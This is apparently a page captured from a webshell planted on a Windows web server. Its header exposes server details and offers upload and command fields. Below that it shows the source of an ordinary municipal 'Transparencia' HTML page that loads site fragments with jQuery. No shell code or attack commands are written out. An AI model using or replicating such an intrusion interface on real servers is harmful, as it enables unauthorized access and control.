403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.109
Web Server : Apache/2.4.54 (Win64) OpenSSL/1.1.1q PHP/8.1.10
System : Windows NT DESKTOP-E5T4RUN 10.0 build 19045 (Windows 10) AMD64
User : SERVERWEB ( 0)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  C:/laragon/backup/www/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : C:/laragon/backup/www/transparencia.html
<!DOCTYPE html>
<!--[if lt IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]><html class="no-js lt-ie10 lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]><html class="no-js lt-ie10 lt-ie9"> <![endif]-->
<!--[if IE 9]><html class="no-js lt-ie10"> <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js">
<!--<![endif]-->
<head>
    <meta charset="utf-8">
    <title>GAMQ</title>
    <meta name="description" content="">
    <meta name="author" content="fams">

    <!-- Mobile Specific Metas -->
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <!-- Favicons -->
    <link rel="shortcut icon" href="images/logo.png">

    <!-- FONTS -->
    <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Roboto:100,300,400,400italic,700'>
    <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=Patua+One:100,300,400,400italic,700'>

    <!-- CSS -->
    <link rel='stylesheet' href='css/global.css'>
    <link rel='stylesheet' href='css/structure.css'>
    <link rel='stylesheet' id='style-static ' href='css/be_style.css'>
    <link rel='stylesheet' href='css/custom.css'>
    <link rel='stylesheet' href='css/bootstrap.min.css'>

    <!-- Revolution Slider -->
    <link rel="stylesheet" href="plugins/rs-plugin/css/settings.css">
    <!-- Revolution Slider -zoonosis-->
    <link rel="stylesheet" href="plugins/rs-plugin-6.custom/css/rs6.css">

    <!-- My styles andanimarions -->
    <!-- <link rel="stylesheet" href="css/custom.css"> -->
    <script src="js/lib/jquery-3.7.1.min.js"></script>
    <script> 
        $(function(){
            $("#scripts").load("scripts.html"); 
            $("#header").load("header.php");
            $("#footer").load("footer.php"); 
            
            // var category = 1; 
            var urlParams = new URLSearchParams(window.location.search);
            var category = urlParams.get('category');
            var author = urlParams.get('author');
            console.log(category);
            if( category==null  && author==null){
                author=1 ;  
            }
            var page = urlParams.get('page');
            $("#press").load("press.php", { category: category , author:author,page:page});
            $("#sidebar").load("sidebar.php", { category: category });
             $("#filters").load("filters.php"); 
        });
    </script>
    
     <script>
        function updateBreadcrumbs() {
            var pageTitle ='Transparencia';
            var pageLink = 'transparencia.html';
            var breadcrumbs = document.getElementById('breadcrumbs');
            breadcrumbs.innerHTML = ''; 
            
            var urlParams = new URLSearchParams(window.location.search);
            var category = urlParams.get('category');
            // var pathArray = window.location.pathname.split('/');
            // var category = getUrlParameter('category');
            // var lastPath = pathArray.pop();  // Get the last part of the URL
            
            // Add "Inicio" breadcrumb
            var inicioLi = document.createElement('li');
            var inicioA = document.createElement('a');
            inicioA.href = '/';
            inicioA.innerText = 'Inicio';
            inicioLi.appendChild(inicioA);
            var inicioSpan = document.createElement('span');
            inicioSpan.innerHTML = '<i class="icon-right-open"></i>';
            inicioLi.appendChild(inicioSpan);
            breadcrumbs.appendChild(inicioLi);

            // Add "Noticias" page name breadcrumb
            var pageLi = document.createElement('li');
            var pageA = document.createElement('a');
            pageA.href = pageLink;
            pageA.innerText = pageTitle;
            pageLi.appendChild(pageA);
            if (category) {
                var categorySpan = document.createElement('span');
                categorySpan.innerHTML = '<i class="icon-right-open"></i>';                
                pageLi.appendChild(categorySpan);
            }
            breadcrumbs.appendChild(pageLi);

            // Add category breadcrumb if available
            if (category) {
                var pageTitle = document.getElementById('pageTitle');
                pageTitle.innerText = category;
                var categoryLi = document.createElement('li');
                categoryLi.innerText = category;
                breadcrumbs.appendChild(categoryLi);
            }
        }

        window.addEventListener('load', updateBreadcrumbs);
    </script>
</head>

<body class="single single-portfolio with_aside aside_right color-blue layout-full-width header-transparent sticky-header sticky-white subheader-title-left">
    <div id="Wrapper">
        <div id="Header_wrapper" class="flv_header_wrapper">
            <div id="header"></div>
            
            <div id="Subheader">        
                <div class="container">
                    <div class="column one">
                        <h1 id="pageTitle" class="title">Transparencia</h1>
                        <ul id="breadcrumbs" class="breadcrumbs">
                        </ul>
                    </div>
                </div>
            </div>
        </div>
        </div>
        <!-- Main Content -->
        <div id="Content">
            <div class="content_wrapper clearfix py-4">
                <div class="sections_group">
                    <div class="extra_content">

                    </div>
                    <div class="section">
                        <div class="section_wrapper clearfix">
                            <div id="Filters" class="column one">
                                <ul class="filters_buttons">
                                    <li class="label">
                                        filtrar por
                                    </li>
                                    <li class="categories">
                                        <a class="open" href="#"><i class="icon-docs"></i>Categorias<i class="icon-down-dir"></i></a>
                                    </li>
                                    <li class="tags">
                                        <a class="open" href="#"><i class="icon-tag"></i>Tags<i class="icon-down-dir"></i></a>
                                    </li>
                                    <li class="authors">
                                        <a class="open" href="#"><i class="icon-user"></i>Autores<i class="icon-down-dir"></i></a>
                                    </li>
                                    <li class="reset">
                                        <a class="close" data-rel="*" href="transparencia.html"><i class="icon-cancel"></i>Mostrar Todo</a>
                                    </li>
                                </ul> 
                                <div id="filters"></div>
                            </div>
                            
                            <div id="press"></div>
                        </div>
                    </div>
                </div>
                
                <!-- Sidebar area-->
                <div id="sidebar"></div>

            </div>
        </div>
        <div id="footer"></div>
    </div>
    
    <div id="scripts"></div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit